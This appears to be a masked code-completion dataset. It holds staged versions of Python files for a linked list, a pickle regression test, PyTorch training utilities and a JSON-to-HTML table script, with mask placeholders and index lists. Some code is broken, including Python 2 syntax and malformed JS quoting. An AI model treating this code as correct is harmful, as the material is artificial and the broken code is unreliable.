current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| <mask token>
class Node(object):
<mask token>
<mask token>
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| <mask token>
class Node(object):
"""Build a node object."""
def __init__(self, data=None, next=None):
"""Constructor for the Node object."""
self.data = data
self.next = next
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError('Empty list, unable to pop')
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError('Nothing in the list.')
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError('No such node.')
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace('[', '(').replace(']', ')')
def __len__(self):
"""Return length of linked list."""
return self.size()
def __str__(self):
"""Display the linked list."""
return self.display()
| """Create a new Node object and attach it a Linked List."""
class Node(object):
"""Build a node object."""
def __init__(self, data=None, next=None):
"""Constructor for the Node object."""
self.data = data
self.next = next
class LinkedList(object):
"""Build linked list."""
def __init__(self, iterable=()):
"""Constructor for the Linked List object."""
self.head = None
self._counter = 0
if isinstance(iterable, (str, tuple, list)):
for item in iterable:
self.push(item)
def push(self, val):
"""Add a new value to the head of the Linked List."""
new_head = Node(val, self.head)
self.head = new_head
self._counter += 1
def pop(self):
"""Remove and return the value if the head of the Linked List."""
if not self.head:
raise IndexError("Empty list, unable to pop")
output = self.head.data
self.head = self.head.next
self._counter -= 1
return output
def size(self):
"""Return size of our list."""
return self._counter
def search(self, val):
"""Search linked list for requested node."""
search_through = self.head
while search_through:
if val == search_through.data:
return search_through
else:
search_through = search_through.next
return search_through
def remove(self, node):
"""Remove selected node."""
current_node = self.head
previous_node = None
found = False
if current_node is None:
raise IndexError("Nothing in the list.")
try:
while current_node and found is False:
if node == current_node.data:
found = True
else:
previous_node = current_node
current_node = current_node.next
if previous_node is None:
self.pop()
elif current_node.next is None:
previous_node.next = None
else:
previous_node.next = current_node.next
except AttributeError:
raise ValueError("No such node.")
self._counter -= 1
def display(self):
"""Display nodes in linked list."""
node = self.head
display_this = []
while node:
display_this.append(node.data)
node = node.next
return str(display_this).replace("[", "(").replace("]", ")")
def __len__(self): # pragma: no cover
"""Return length of linked list."""
return self.size()
def __str__(self): # pragma: no cover
"""Display the linked list."""
return self.display()
| [
6,
10,
12,
14,
15
] |
1,619 | 6acb253189798c22d47feb3d61ac68a1851d22ba | <mask token>
| <mask token>
try:
copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| <mask token>
temp_filename = 'temp.pickle'
try:
copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| import pickle
from generation_code import serial_filename
import serial_output_code
import numpy as np
from shutil import copyfile
from os import remove
temp_filename = 'temp.pickle'
try:
copyfile(serial_filename(), temp_filename)
serial_output_code.serial_output_code()
with open(serial_filename(), 'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename, 'rb') as f:
old_out = pickle.load(f)
finally:
copyfile(temp_filename, serial_filename())
remove(temp_filename)
assert qmc_out[0] == old_out[0]
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == len(old_out) + 1
for ii in range(1, len(old_out)):
assert len(old_out[ii]) == len(qmc_out[ii])
for jj in range(len(qmc_out[1])):
assert np.all(np.isclose(qmc_out[ii][jj], old_out[ii][jj]))
| import pickle
from generation_code import serial_filename
import serial_output_code
import numpy as np
from shutil import copyfile
from os import remove
# This file is only temporary, mostly to be used when updating the
# reference output from a regression test, to ensure that, in all
# aspects that are in common with the previosu regression test, the new
# solution is the same.
# It is largely the same as test_serial_code.py
temp_filename = 'temp.pickle'
try:
# Copy reference output to temporary location
copyfile(serial_filename(),temp_filename)
# Run serial code
serial_output_code.serial_output_code()
with open(serial_filename(),'rb') as f:
qmc_out = pickle.load(f)
with open(temp_filename,'rb') as f:
old_out = pickle.load(f)
finally:
# Copy reference output back
copyfile(temp_filename,serial_filename())
# Remove temporary file
remove(temp_filename)
assert qmc_out[0] == old_out[0] # should be a float
print(len(qmc_out))
print(len(old_out))
assert len(qmc_out) == (len(old_out) + 1) # Because we've added in a new output
for ii in range(1,len(old_out)):
assert(len(old_out[ii])==len(qmc_out[ii]))
for jj in range(len(qmc_out[1])):
# For some reason, the sizes of these variables (in
# bytes) aren't always the same. I've no idea why.
# Hence, this assertion is commented out.
#assert getsizeof(qmc_out[ii][jj]) == getsizeof(old_out[ii][jj])
#assert np.all(np.isclose(qmc_out[ii][jj],old_out[ii][jj]))
assert np.all(np.isclose(qmc_out[ii][jj],old_out[ii][jj]))
| [
0,
1,
2,
3,
4
] |
1,620 | be90dcb4bbb69053e9451479990e030cd4841e4a | #-*- coding: utf8 -*-
#credits to https://github.com/pytorch/examples/blob/master/imagenet/main.py
import shutil, time, logging
import torch
import torch.optim
import numpy as np
import visdom, copy
from datetime import datetime
from collections import defaultdict
from generic_models.yellowfin import YFOptimizer
logger = logging.getLogger('app')
logger.setLevel(logging.DEBUG)
class VisdomMonitor(object):
def __init__(self, prefix=None, server='http://localhost', port=8097):
self.__prefix = prefix or datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')
self.__vis = visdom.Visdom(server=server, port=port)
self.__metrics = defaultdict(lambda :defaultdict(list))
self.__win_dict = {}
self.__opts = self._init_opts()
def _init_opts(self):
opts = dict(legend=['Train', 'Validate'])
return opts
def __add(self, name, value, type):
self.__metrics[type][name].append(value)
def _add_val_performance(self, name, value):
self.__add(name, value, type='val')
def _add_train_performance(self, name, value):
self.__add(name, value, type='train')
def add_performance(self, metric_name, train_value, val_value):
self._add_train_performance(metric_name, train_value )
self._add_val_performance(metric_name, val_value)
self.plot(metric_name)
def plot(self, metric_name):
current_win = self.__win_dict.get(metric_name, None)
train_values = self.__metrics['train'][metric_name]
val_values = self.__metrics['val'][metric_name]
epochs = max(len(train_values), len(val_values))
values_for_plot = np.column_stack((np.array(train_values), np.array(val_values)))
opts = copy.deepcopy(self.__opts)
opts.update(dict(title='%s\ntrain/val %s' % (self.__prefix, metric_name)))
win = self.__vis.line(Y=values_for_plot, X=np.arange(epochs), opts=opts, win=current_win)
if current_win is None:
self.__win_dict[metric_name] = win
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate_by_schedule(config, optimizer, epoch, decrease_rate=0.1):
"""Sets the learning rate to the initial LR decayed by 1/decrease_rate every 10 epochs"""
if not isinstance(optimizer, torch.optim.SGD):
return
#lr = config.lr * (0.1 ** (epoch // 10))
if epoch and epoch % 10 == 0:
for i, param_group in enumerate(optimizer.param_groups):
param_group['lr'] *= decrease_rate
logger.info('Setting learning layer=i, rate=%.6f', i, param_group['lr'])
class PlateauScheduler(object):
"""Sets the lr to the initial LR decayed by 1/decrease_rate, when not improving for max_stops epochs"""
def __init__(self, optimizer, patience, early_stop_n, decrease_rate=0.1, eps=1e-5,
warm_up_epochs=None, best_score=None):
self.optimizer = optimizer
if not isinstance(optimizer, (torch.optim.SGD, YFOptimizer)):
raise TypeError
self.patience = patience
self.early_stop_n = early_stop_n
self.decrease_rate = decrease_rate
self.eps = eps
self.warm_up_epochs = warm_up_epochs
self.__lr_changed = 0
self.__early_stop_counter = 0
self.__best_score = best_score
self.__descrease_times = 0
self.__warm_up = self.__has_warm_up(optimizer)
def __has_warm_up(self, optimizer):
for param_group in self.optimizer.param_groups:
if param_group['lr'] != param_group['after_warmup_lr']:
logger.info('Optimizer has warm-up stage')
return True
def step(self, epoch, score):
adjusted, to_break = False, False
prev_best_score = self.__best_score or -1
is_best = self.__best_score is None or score < self.__best_score - self.eps
self.__best_score = self.__best_score is not None and min(score, self.__best_score) or score
if is_best:
logger.info('Current model is best by val score %.5f < %.5f' % (self.__best_score, prev_best_score))
self.__early_stop_counter = 0
else:
self.__early_stop_counter += 1
if self.__early_stop_counter >= self.early_stop_n:
logger.info('Early stopping, regress for %d iterations', self.__early_stop_counter)
to_break = True
logger.info('early_stop_counter: %d', self.__early_stop_counter)
if (self.warm_up_epochs and self.__descrease_times == 0 and self.__warm_up and epoch >= self.warm_up_epochs - 1 ) or \
(self.__lr_changed <= epoch - self.patience and \
(self.__early_stop_counter is not None and self.patience and self.__early_stop_counter >= self.patience)):
self.__lr_changed = epoch
for param_group in self.optimizer.param_groups:
if self.__descrease_times == 0 and self.__warm_up:
param_group['lr'] = param_group['after_warmup_lr']
else:
param_group['lr'] = param_group['lr'] * self.decrease_rate
logger.info('Setting for group learning rate=%.8f, epoch=%d', param_group['lr'], self.__lr_changed)
adjusted = True
self.__descrease_times += 1
return adjusted, to_break, is_best
def init_optimizer(model, config, exact_layers=None):
"""param 'exact_layers' specifies which parameters of the model to train, None - all,
else - list of layers with a multiplier (optional) for LR schedule"""
opt_type = config.optimizer
if exact_layers:
logger.info('Learning exact layers, number=%d', len(exact_layers))
parameters = []
for i, layer in enumerate(exact_layers):
if isinstance(layer, tuple) and len(layer) == 2:
layer, multiplier = layer
init_multiplier = 1
elif isinstance(layer, tuple) and len(layer) == 3:
layer, init_multiplier, multiplier = layer
else:
multiplier = 1
init_multiplier = 1
lr = config.lr * multiplier
init_lr = config.lr * multiplier * init_multiplier
logger.info('Layer=%d, lr=%.5f', i, init_lr)
parameters.append({'params': layer.parameters(), 'lr': init_lr, 'after_warmup_lr': lr})
else:
logger.info('Optimizing all parameters, lr=%.5f', config.lr)
parameters = model.parameters()
if opt_type == 'sgd':
optimizer = torch.optim.SGD(parameters, config.lr, momentum=config.momentum, weight_decay=config.weight_decay)
elif opt_type == 'adam':
optimizer = torch.optim.Adam(parameters, lr=config.lr, weight_decay=config.weight_decay)
elif opt_type == 'yf':
optimizer = YFOptimizer(parameters, config.lr, mu=config.momentum, weight_decay=config.weight_decay,
clip_thresh=0.1)
else:
raise TypeError, 'Unknown optimizer type=%s' % (opt_type, )
return optimizer
def save_checkpoint(state, epoch, is_best, filename, best_filename):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
shutil.copyfile(filename, best_filename + '-%d' % epoch)
def load_checkpoint(filename):
checkpoint = torch.load(filename)
return checkpoint
def train(train_loader, model, criterion, optimizer, epoch, is_multi_fc=False):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
predictions = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
if is_multi_fc==False:
# this is original loss function
output = model(input_var)
loss = criterion(output, target_var)
else:
# this is for inception_v3 with 2 output channels
# https://github.com/pytorch/vision/issues/302
output, output_aux = model(input_var)
loss = criterion(output, target_var)
loss+= criterion(output_aux, target_var)
# measure accuracy and record loss
losses.update(loss.data[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if (i and i % 50 == 0) or i == len(train_loader) - 1:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Accuracy {acc.val:.4f} ({acc.avg:.4f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, acc=predictions))
return losses.avg
def compute_f2(output, target):
true_and_pred = target * output
ttp_sum = torch.sum(true_and_pred, 1)
tpred_sum = torch.sum(output, 1)
ttrue_sum = torch.sum(target, 1)
tprecision = ttp_sum / tpred_sum
trecall = ttp_sum / ttrue_sum
f2 = ((1 + 4) * tprecision * trecall) / (4 * tprecision + trecall)
return f2
def validate(val_loader, model, criterion, activation=torch.sigmoid):
logger.info('Validating model')
batch_time = AverageMeter()
losses = AverageMeter()
f2s = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# compute f2
f2 = compute_f2(activation(output), target_var).mean()
f2s.update(f2.data[0], input.size(0))
# measure accuracy and record loss
losses.update(loss.data[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
logger.info('Test: [{0}/{0}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.avg:.5f}\t'
'F2: {f2s.avg}\t'.format(
len(val_loader), batch_time=batch_time, loss=losses, f2s=f2s))
return losses.avg
def get_outputs(loader, model, activation):
model.eval()
outputs, targets = [], []
for i, (input, target) in enumerate(loader):
input_var = torch.autograd.Variable(input, volatile=True)
output = model(input_var)
if activation is not None:
output = activation(output)
outputs.extend(output.cpu().data)
targets.extend(target)
return outputs, targets
def test_model(test_loader, model, activation=None):
logger.info('Testing')
model.eval()
names, results = [], []
for i, (input, name_batch) in enumerate(test_loader):
input_var = torch.autograd.Variable(input, volatile=True)
output = model(input_var)
if activation is not None:
output = activation(output)
names.extend(name_batch)
results.extend(output.cpu())
if i and i % 20 == 0:
logger.info('Batch %d',i)
return names, results
| null | null | null | null | [
0
] |
1,621 | d6e836140b1f9c955711402111dc07e74b4a23b1 | <mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
<mask token>
| <mask token>
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
<mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
Extracts the informations stored in the JSON files and stores creates an HTML-table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
* adding all bootstrap relevent dependencies to the headder
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
dir_out the directory to safe the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
        name=args['file_name'], format='html')
| <mask token>
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
<mask token>
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
    Extracts the information stored in the JSON files and creates an HTML table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
     * adding all bootstrap relevant dependencies to the header
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
    dir_out the directory to save the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
        name=args['file_name'], format='html')
| <mask token>
from collections import defaultdict
from argparse import ArgumentParser
import os
import sys
import json
import pandas as pd
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
from src.util import sanity_util
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
    Extracts the information stored in the JSON files and creates an HTML table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix=
'.{}'.format(format))
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.
listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
df = pd.DataFrame.from_dict(table)
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return """
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
     * adding all bootstrap relevant dependencies to the header
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
" +
"<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
" +
"<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
" +
"<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
"""
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
    dir_out the directory to save the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'],
        name=args['file_name'], format='html')
| """
This module provides a script to extract data from all JSON files stored in a specific directory and create an HTML
table for a better overview of the data.
.. moduleauthor:: Maximilian Springenberg <[email protected]>
|
"""
from collections import defaultdict
from argparse import ArgumentParser
import os
import sys
import json
import pandas as pd
